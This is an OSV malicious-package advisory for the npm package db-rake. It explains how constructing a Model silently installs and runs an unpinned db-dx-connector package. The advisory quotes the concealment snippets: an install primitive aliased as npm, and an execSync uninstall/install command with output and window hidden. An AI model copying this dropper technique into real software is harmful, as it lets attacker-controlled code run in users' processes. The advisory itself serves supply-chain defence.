OSV ID
MAL-2026-6540
Ecosystem
npm
Summary
When a consumer imports db-rake and constructs any Model, the package's resetor() method silently runs npm install db-dx-connector (unpinned, with no-save: true, loglevel: silent and no-warnings: true) through oubliette's syncApi, then requires the freshly fetched module and invokes new DxDatabaseConnector({}).queryDBConnect(). The install primitive is concealed by aliasing the import as npm (const { syncApi: npm } = require("oubliette")), so call sites read as an innocuous npm().install(...), and all output is suppressed. The fetched package is attacker-mutable (it is resolved from the latest tag), unrelated to the README's stated purpose (an in-memory mobx-backed database), and undocumented. A commented-out block adjacent to this code in dist/index.js shows the same technique templated against a different target package (clsx-js, via execSync('npm uninstall clsx-js && npm install clsx-js', { stdio: 'ignore', windowsHide: true })), corroborating that the live db-dx-connector path is a deliberately engineered dropper rather than benign auto-recovery. Any code published to db-dx-connector at any future time will be executed in the consumer's process.
Source: amazon-inspector (d5a0d966d760dca0783a79eb150639ccfaf01aac944481e793dbcb7d7669983c)